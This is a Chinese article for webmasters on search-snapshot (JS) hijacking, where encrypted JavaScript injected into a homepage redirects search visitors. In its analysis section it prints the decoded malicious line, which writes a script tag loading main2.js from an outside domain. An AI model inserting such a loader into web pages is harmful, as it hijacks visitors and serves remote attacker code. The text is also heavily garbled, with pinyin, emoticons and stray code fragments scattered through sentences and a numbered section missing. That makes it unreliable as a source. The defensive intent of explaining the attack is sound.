站長(cháng)們經(jīng)(jing)常遇到j(luò )s快照劫持的問(wèn)題，對網(wǎng)站的(′?ω?`)百度被劫優(yōu)化帶來(lái)及大的影響。對于大多數新手站長(cháng)來(lái)說(shuō)js快照劫持，快照束手無(wú)ヽ(′ー｀)ノ策。持處程今?天大寶簡(jiǎn)單跟大家進(jìn)行一輪深度的理恢解析。

一，js快照劫持示例

js快照劫持演示圖，記錄了是網(wǎng)站網(wǎng)站跳轉的。

一個(gè)是百度搜索快照劫持演示。另一個(gè)是快照搜狐搜索快??照劫持演示。

102, 102);"> JS快照劫持，百度搜索演示圖

JS快照劫持，搜狐搜索演示圖

二，分析js快照劫持代碼

經(jīng)分析，網(wǎng)站首頁(yè)被植入了惡意了代碼，網(wǎng)站而且是多次加密JS代碼。

此段代碼就是添加在網(wǎng)站首頁(yè)的JS，而且屬于了加密了的代碼，一般看不出什么貓膩。

接下來(lái)進(jìn)行??JS反向解析分析?？梢允褂谜鹃L(cháng)工具在線(xiàn)分析：http://tool.chinaz.com/js.aヽ(′ー｀)ノspx

站長(cháng)工具JS混淆加密壓縮 截圖

解析后，可以看到真面目，這段代碼。

< scrip??t type = “text/javas??cript” >
document.writeln(&( ?ヮ?)ldquo;<script src=http://www.5121188.com/main2.js></script>”); < /script>

打開(kāi)這個(gè)main2.js可以看到一段落代碼??。

JS惡意代碼二次加密

攻擊者真的多有精力，層層加密啊。怪不得一般站長(cháng)根本無(wú)法發(fā)現(xian)。

然后再進(jìn)行解密。

被加密的JS惡意代碼解析圖???

這下大家應該清楚了，攻擊者對代碼進(jìn)行了3次的加密再調用，來(lái)實(shí)現百度快照的JS劫持跳轉。

四，網(wǎng)站安全建議

網(wǎng)站安全一直是一個(gè)讓站長(cháng)運營(yíng)者頭痛的問(wèn)題，沒(méi)有百分百安全的網(wǎng)站，只有一斷的進(jìn)行維護和優(yōu)化，做到定期備份，定期檢查，最大程度的杜絕網(wǎng)站被黑被劫持的風(fēng)險。希望各位站長(cháng)清楚(′?_?`)并且牢??記在心。